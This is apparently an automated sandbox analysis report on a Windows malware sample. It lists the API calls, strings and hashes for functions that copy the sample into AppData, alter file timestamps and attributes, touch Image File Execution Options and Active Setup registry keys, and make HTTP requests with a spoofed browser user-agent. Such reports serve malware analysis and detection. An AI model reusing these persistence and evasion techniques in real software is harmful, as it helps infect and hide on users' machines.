0x00404c92
0x00404c9b
0x00404ca0
0x00404ca4
0x00404ca6
0x00404cad
0x00404caf
0x00404cb4
0x00404cb7
0x00404cbe
0x00404cc3
0x00404cc3
0x00404cc5
0x00404cd0
0x00404cd4
0x00404cd5
0x00000000
0x00404cc7
0x00404cc9
0x00000000
0x00404cc9
0x00404cc5
0x00404cdb
0x00000000
0x00404cdb
0x00404c71
0x00404c78
0x00404c78
0x00000000
0x00404c16
0x00404938
0x00404940
0x00404945
0x0040494b
0x00404950
0x00404951
0x00404956
0x00404957
0x0040495c
0x00404961
0x00404961
0x00404966
0x00000000
0x00000000
0x00404968
0x0040496b
0x0040496b
0x00404977
0x0040497c
0x00404983
0x00404985
0x004049a5
0x00404987
0x0040498d
0x00404999
0x00404999
0x004049af
0x004049b7
0x004049cf
0x004049d4
0x004049db
0x004049dd
0x00404b6f
0x00404b76
0x00404b88
0x00000000
0x004049e3
0x004049e3
0x004049e6
0x00000000
0x00000000
0x00404a01
0x00404a06
0x00404a0b
0x00404a0f
0x00404a11
0x00404a13
0x00404a13
0x00404a1b
0x00404a20
0x00404a25
0x00404a27
0x00404a29
0x00404a2d
0x00404a30
0x00404a30
0x00404a32
0x00000000
0x00000000
0x00404a39
0x00404a3b
0x00404a3c
0x00404a3e
0x00404a3f
0x00404a3f
0x00404a44
0x00404a4b
0x00404a4e
0x00404a4f
0x00404a54
0x00404a5b
0x00404a5d
0x00404a64
0x00404a66
0x00404a67
0x00404a6b
0x00404a6b
0x00404a6f
0x00404a7a
0x00404a7d
0x00404a81
0x00404a83
0x00404a84
0x00404a89
0x00404a8c
0x00404a8c
0x00404a8e
0x00000000
0x00000000
0x00404a95
0x00404a97
0x00404a98
0x00404a98
0x00404a98
0x00404ab4
0x00404abb
0x00404ac0
0x00404ac5
0x00404ae6
0x00404ae6
0x00404af2
0x00404b06
0x00404b0e
0x00404b1a
0x00404b1f
0x00404b44
0x00404b49
0x00404b4a
0x00404b4f
0x00404b4f
0x00404b62
0x00404b67
0x00000000
0x00404b67
0x004049dd
0x004047e7
0x004047ef
0x00404805
0x00404806
0x0040480d
0x0040480e
0x00404823
0x00404823
0x0040482a
0x0040482b
0x00404830
0x00404833
0x00000000
0x00000000
0x00404815
0x0040481c
0x0040481d
0x0040481e
0x0040481e
0x00000000
0x00404823
0x00000000
0x004047ef
0x0040458d
0x00404592
0x00404594
0x00000000
0x00000000
0x0040459f
0x004045a7
0x004045ac
0x004045b2
0x004045b7
0x004045b8
0x004045bd
0x004045be
0x004045c3
0x004045c8
0x004045c8
0x004045cd
0x00000000
0x00000000
0x004045cf
0x004045d2
0x004045d2
0x004045de
0x004045e3
0x004045ea
0x004045ec
0x0040460c
0x004045ee
0x004045f4
0x00404600
0x00404600
0x00404616
0x0040461e
0x00404636
0x0040463b
0x00404642
0x00404644
0x004047bd
0x004047c4
0x00000000
0x0040464a
0x0040464a
0x0040464d
0x00000000
0x00000000
0x00404668
0x0040466d
0x00404672
0x00404676
0x00404678
0x0040467a
0x0040467a
0x00404682
0x00404687
0x0040468c
0x0040468e
0x00404690
0x00404694
0x00404697
0x00404697
0x00404699
0x00000000
0x00000000
0x004046a0
0x004046a2
0x004046a3
0x004046a5
0x004046a6
0x004046a6
0x004046ab
0x004046b2
0x004046b5
0x004046b6
0x004046bb
0x004046c2
0x004046c4
0x004046cb
0x004046cd
0x004046ce
0x004046d2
0x004046d2
0x004046d6
0x004046e1
0x004046e4
0x004046e8
0x004046ea
0x004046eb
0x004046f0
0x004046f3
0x004046f3
0x004046f5
0x00000000
0x00000000
0x004046fc
0x004046fe
0x004046ff
0x004046ff
0x004046ff
0x0040471b
0x00404722
0x00404727
0x0040472c
0x0040474d
0x0040474d
0x00404759
0x0040476d
0x00404775
0x00404786
0x00404792
0x00404797
0x00404798
0x0040479d
0x0040479d
0x004047b0
0x004047b5
0x00000000
0x004047b5
0x00404644
0x00404307
0x0040430f
0x00404314
0x0040431a
0x0040431f
0x00404320
0x00404326
0x0040432b
0x00404336
0x0040433d
0x004043b6
0x004043bb
0x004043d4
0x004043db
0x004043dd
0x004043eb
0x00404402
0x00404408
0x00404408
0x004043dd
0x00404412
0x0040442b
0x00404432
0x00404434
0x00404454
0x0040445a
0x0040445a
0x00404434
0x00404461
0x00404469
0x00404472
0x00404477
0x0040447f
0x0040448b
0x0040448c
0x0040448d
0x0040448f
0x00404491
0x00404493
0x00404495
0x00404497
0x00404499
0x0040449b
0x0040449c
0x004044a3
0x004044a8
0x004044a8
0x00000000
0x004044a8
0x0040433f
0x00404344
0x00404345
0x0040434b
0x00404350
0x00404358
0x0040435e
0x00404364
0x0040436b
0x0040437a
0x0040437a
0x0040437f
0x00404380
0x00404386
0x0040438c
0x00404392
0x0040439f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040439f
0x00404371
0x00404378
0x00000000
0x00000000
0x00000000

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004042B2
GetFileTime.KERNEL32(00000000,?,?,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004042DE
CloseHandle.KERNEL32(?,00000000,?,?,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004042EA
GetSystemDirectoryA.KERNEL32 ref: 0040430F
lstrcat.KERNEL32(?,0041103E), ref: 00404320
lstrcat.KERNEL32(00000000,?), ref: 00404326

Part of subcall function 004010F7: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040111F
Part of subcall function 004010F7: SetFileAttributesA.KERNEL32(?,00000080,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040113D
Part of subcall function 004010F7: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401155

lstrcpy.KERNEL32(?,%CommonProgramFiles%\System\), ref: 00404358
lstrcat.KERNEL32(00000000,?), ref: 0040435E
ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,?,%CommonProgramFiles%\System\,?,00000104,00000000,?,0041103E,?,00000100,?,80000000,00000001,00000000,00000003), ref: 00404364
lstrcpy.KERNEL32(?,%AppData%\), ref: 0040438C
lstrcat.KERNEL32(00000000,?), ref: 00404392
ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,?,%AppData%\,?,00000104,00000000,00000000,?,%CommonProgramFiles%\System\,?,00000104,00000000,?,0041103E,?), ref: 00404398
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0041103E,?,00000100,?,80000000,00000001,00000000), ref: 004043D4
SetFilePointer.KERNEL32(00000000,000000F0,00000000,00000002,?,40000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0041103E,?,00000100), ref: 004043EB
WriteFile.KERNEL32(00000000,004120E0,00000004,?,00000000,00000000,000000F0,00000000,00000002,?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 00404402
CloseHandle.KERNEL32(00000000,00000000,004120E0,00000004,?,00000000,00000000,000000F0,00000000,00000002,?,40000000,00000000,00000000,00000003,00000000), ref: 00404408
CreateFileA.KERNEL32(?,80000100,00000001,00000000,00000003,00000000,00000000,00000000,?,0041103E,?,00000100,?,80000000,00000001,00000000), ref: 0040442B
SetFileTime.KERNEL32(00000000,?,?,?,?,80000100,00000001,00000000,00000003,00000000,00000000,00000000,?,0041103E,?,00000100), ref: 00404454
CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,80000100,00000001,00000000,00000003,00000000,00000000,00000000,?,0041103E,?), ref: 0040445A
SetFileAttributesA.KERNEL32(?,00000021,00000000,?,0041103E,?,00000100,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00404469
CloseHandle.KERNEL32(?,?,00000021,00000000,?,0041103E,?,00000100,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00404472
GetStartupInfoA.KERNEL32(?), ref: 0040447F
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,000000FF,?,?), ref: 0040449C
ExitProcess.KERNEL32(00000000,00000002,00000000,00000000,?,00000104,?,004107CF), ref: 004044A3
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,%ComSpec%,?,00000104), ref: 004044C6
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,00000000,00000000,?,00000104), ref: 004044DE
ReadFile.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002), ref: 00404504
CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00404510
CreateThread.KERNEL32 ref: 0040453F
CloseHandle.KERNEL32(00000000,00000000,00001000,00401038,?,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000,%ComSpec%,?), ref: 00404545

Part of subcall function 004010F7: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,?,00001000,?,00000000,?,40000000,00000000,00000000,00000002), ref: 00401168
Part of subcall function 004010F7: CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,00001000,?,00000000,?,40000000,00000000,00000000), ref: 0040116E

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe, xrefs: 0040454A
%CommonProgramFiles%\System\, xrefs: 0040434B
%AppData%\, xrefs: 00404386

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: File$CloseCreateHandle$lstrcat$AttributesEnvironmentExpandProcessStringsTimelstrcpy$DirectoryExitInfoPointerReadSizeStartupSystemThreadWrite
String ID: %AppData%\$%CommonProgramFiles%\System\$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
API String ID: 2553420183-3658061057
Opcode ID: 0cd8fa7b4ea88beba9854b847033eb4beb1f5de5f8e1fe914b12fd5f52d0464e
Instruction ID: 690550774270466be3d94ef6732d86702873fb7c6e332710f6e85b8427b6284d
Opcode Fuzzy Hash: 0cd8fa7b4ea88beba9854b847033eb4beb1f5de5f8e1fe914b12fd5f52d0464e
Instruction Fuzzy Hash: 015173B02447407AEB30A6618C4AFDB319DAF84748F50493FB784F61D2DBBCA5458B6E

Uniqueness

Uniqueness Score: -1.00%

Function 004019E8 Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 203
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32(?,?), ref: 00401A14
lstrlen.KERNEL32(00000000,?,?), ref: 00401A1A
htons.WS2_32(00000050), ref: 00401A7B
inet_addr.WS2_32(?), ref: 00401A96
gethostbyname.WS2_32(?), ref: 00401AA5
socket.WS2_32(00000002,00000001,00000006), ref: 00401AD6
closesocket.WS2_32(00000000), ref: 00401AF9
wsprintfA.USER32 ref: 00401B44
send.WS2_32(00000000,?,00000000,00000000), ref: 00401B5A
lstrcmpi.KERNEL32 ref: 00401B8B
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Win32),00000004,00000000,00000000,00000000), ref: 00401C0F
InternetSetOptionA.WININET(00000000,00000002,00000004), ref: 00401C35
InternetSetOptionA.WININET(00000000,00000006,00000004,00000004), ref: 00401C41
InternetSetOptionA.WININET(00000000,00000005,00000004,00000004), ref: 00401C4D
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84280300,00000000), ref: 00401C65
InternetCloseHandle.WININET(00000000), ref: 00401CA0

Strings

0, xrefs: 00401B7D
P, xrefs: 00401B23
HTTP/1.0 200, xrefs: 00401B77
Mozilla/4.0 (compatible; MSIE 6.0; Win32), xrefs: 00401C0A
GET /%s HTTP/1.0Host: %s:%uUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0), xrefs: 00401B3D, 00401B42
GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0), xrefs: 00401B36

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: Internet$Option$Open$CloseHandleclosesocketgethostbynamehtonsinet_addrlstrcmpilstrcpylstrlensendsocketwsprintf
String ID: 0$GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)$GET /%s HTTP/1.0Host: %s:%uUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)$HTTP/1.0 200$Mozilla/4.0 (compatible; MSIE 6.0; Win32)$P
API String ID: 326340279-3185374940
Opcode ID: f61ae276233b98704c1b0434e4427c4ff60efb953552e0692ee85f0fa3fa9631
Instruction ID: f87274f76e66a91bb03daa9740d34f21cd30a4f309872cf7f6b7342f01a6976e
Opcode Fuzzy Hash: f61ae276233b98704c1b0434e4427c4ff60efb953552e0692ee85f0fa3fa9631
Instruction Fuzzy Hash: 1871C6B0A402159EE7209B65CC45B9B76A8EF05354F1480BAF704FB2E2D7BC99448B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00402427 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 136
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004010B2: wsprintfA.USER32 ref: 004010C5

lstrcpy.KERNEL32(?,00402796), ref: 00402482
gethostbyname.WS2_32(?), ref: 00402495
htons.WS2_32(00000050), ref: 004024AA
socket.WS2_32(00000002), ref: 004024CC
closesocket.WS2_32(00000000), ref: 004024E8

Part of subcall function 00401832: RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections,00000000,00000000,00000000,000F003F,00000000,00000000,00000000,?,?,?,?,00402515,?,00402796), ref: 00401870

InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Win32),00000004,00000000,00000000,00000000), ref: 00402522
InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 00402543
InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 0040254F
InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 0040255B
wsprintfA.USER32 ref: 00402570
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84280300,00000000), ref: 00402582
InternetCloseHandle.WININET(00000000), ref: 004025A2
InternetCloseHandle.WININET(00000000), ref: 004025A9
InternetCloseHandle.WININET(00000000), ref: 004025B4

Strings

http://%s/, xrefs: 00402566
Mozilla/4.0 (compatible; MSIE 6.0; Win32), xrefs: 0040251D

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: Internet$CloseHandleOption$Openwsprintf$Createclosesocketgethostbynamehtonslstrcpysocket
String ID: Mozilla/4.0 (compatible; MSIE 6.0; Win32)$http://%s/
API String ID: 2574392083-3144419281
Opcode ID: 8558777f28e11f320a9779a057592e184873376841df9573c18ff01c6ab61af4
Instruction ID: 67c2733fa8eb29aad750db9e29587364db6da652461455575ed9c5e3ed18a433
Opcode Fuzzy Hash: 8558777f28e11f320a9779a057592e184873376841df9573c18ff01c6ab61af4
Instruction Fuzzy Hash: 3941BD70644300BEE710AB24CE8AB5B36A5AF44744F04853AF641EA2D1D7FC9951CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 004030DE Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,?,SOFTWARE\Microsoft\Active Setup\Installed Components\,{38383738-3439-3838-3738-343938383738}), ref: 004030FB
RegQueryValueExA.ADVAPI32(?,SubshellState,00000000,0002001F,?,0000022A,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F), ref: 00403122
RegCloseKey.ADVAPI32(0002001F,?,SubshellState,00000000,0002001F,?,0000022A,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F), ref: 0040312F
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,?,SOFTWARE\Microsoft\Active Setup\Installed Components\,{38383738-3439-3838-3738-343938383738}), ref: 00403146
RegQueryValueExA.ADVAPI32(0002001F,SubshellState,00000000,0002001F,?,0000022A,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F), ref: 0040316D
RegCloseKey.ADVAPI32(0002001F,0002001F,SubshellState,00000000,0002001F,?,0000022A,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F), ref: 00403180

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced, xrefs: 004030F1, 0040313C
SubshellState, xrefs: 00403119, 00403164

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$SubshellState
API String ID: 3677997916-1581766880
Opcode ID: 1dbeb0f13a55c858fa009bfbf9dc959ef1499f7908d0e88d8003f190fd8f8784
Instruction ID: 3beb80fef79f5c207cf2a6ebc17cef41e9b326a57f1f729476a9612e7a75af9c
Opcode Fuzzy Hash: 1dbeb0f13a55c858fa009bfbf9dc959ef1499f7908d0e88d8003f190fd8f8784
Instruction Fuzzy Hash: 4001D6312883017AE710AF51DC46F9B7AEC9F44784F10443FBA49B50D1E6BCED95861E

Uniqueness

Uniqueness Score: -1.00%

Function 00401038 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45
processfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoA.KERNEL32(?), ref: 00401046
CreateProcessA.KERNEL32(?,--k33p,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 00401061
CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,--k33p,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401076
WaitForSingleObject.KERNEL32(?,000000FF,?,80000000,00000000,00000000,00000003,00000000,00000000,?,--k33p,00000000,00000000,00000000,00000000,00000000), ref: 00401083
CloseHandle.KERNEL32(00000000,?,000000FF,?,80000000,00000000,00000000,00000003,00000000,00000000,?,--k33p,00000000,00000000,00000000,00000000), ref: 0040109A
CloseHandle.KERNEL32(?,?,000000FF,?,80000000,00000000,00000000,00000003,00000000,00000000,?,--k33p,00000000,00000000,00000000,00000000), ref: 004010A2
CloseHandle.KERNEL32(?,?,?,000000FF,?,80000000,00000000,00000000,00000003,00000000,00000000,?,--k33p,00000000,00000000,00000000), ref: 004010AB

Strings

--k33p, xrefs: 0040105B

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: CloseHandle$Create$FileInfoObjectProcessSingleStartupWait
String ID: --k33p
API String ID: 881816827-1573217081
Opcode ID: 0665990555e130db79a55a493bea7be6c41083c66c963b8a99a959b6ab45e4cf
Instruction ID: a256d911639786f03d362c3fe8c500751f7b31c154176f2d7aa8b79109b77891
Opcode Fuzzy Hash: 0665990555e130db79a55a493bea7be6c41083c66c963b8a99a959b6ab45e4cf
Instruction Fuzzy Hash: 81F05E30244711BAE62136328C8FF5F355DDF40B24F608A3BB660750D2EA7CB9505A6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040172D Relevance: 12.1, APIs: 8, Instructions: 82
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0040174D
connect.WS2_32(00000000,?,00000010), ref: 0040175E
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0040176E
WSAGetLastError.WS2_32 ref: 0040177A
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0040178D

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: ioctlsocket$ErrorLastconnect
String ID:
API String ID: 1886816560-0
Opcode ID: 677cc13455a5f7a119c18716787c96d8a77d10d3ec13df7a00fdc9dc73332b16
Instruction ID: 80ff8d8e7914a780a02c5522988b0addf1eea3e83e0555c781dce3cf114191c7
Opcode Fuzzy Hash: 677cc13455a5f7a119c18716787c96d8a77d10d3ec13df7a00fdc9dc73332b16
Instruction Fuzzy Hash: DF21D3715083016AE720AA318C41FAF76ECEF85319F014A3EF591E61E1E77C995887AB

Uniqueness

Uniqueness Score: -1.00%

Function 004011CF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019), ref: 004011F4
wsprintfA.USER32 ref: 0040120B
RegEnumKeyA.ADVAPI32(?,00000000,?,00000300), ref: 0040122F
RegCloseKey.ADVAPI32(?,00000000,00000000,?,00000300), ref: 0040123B
RegDeleteKeyA.ADVAPI32(?), ref: 00401242

Strings

%s\%s, xrefs: 00401201

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: CloseDeleteEnumOpenwsprintf
String ID: %s\%s
API String ID: 4202809218-4073750446
Opcode ID: ed11a8c0a37f982d0e17aaa52e49a7ac20ff598423f49ef788d26e1bee621713
Instruction ID: 43378be4e51f8d6f5b4f2e5c17315015ce79a34e9362f07ea0b2f9227eb5dab3
Opcode Fuzzy Hash: ed11a8c0a37f982d0e17aaa52e49a7ac20ff598423f49ef788d26e1bee621713
Instruction Fuzzy Hash: 93F0C8716842043BE221F2169C82FFB659DDB887D8F00043EF609F51D3EA388D55516A

Uniqueness

Uniqueness Score: -1.00%

Function 004025C3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RasEnumConnectionsA.RASAPI32(004028DE,004028DE,004028DE), ref: 004025F6
lstrcmpi.KERNEL32 ref: 00402620
lstrcmpi.KERNEL32 ref: 0040263E

Strings

modem, xrefs: 00402609
isdn, xrefs: 00402629

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: lstrcmpi$ConnectionsEnum
String ID: isdn$modem
API String ID: 1014164406-1928581975
Opcode ID: 8146aa7d45ddf9213865f455b1552900cd1ed20f7322fa4dc1291e7ed423a0ba
Instruction ID: 9b8ea77cd675e603e91f08c673882212f316c2627d3a17e85c4274d3e77867b6
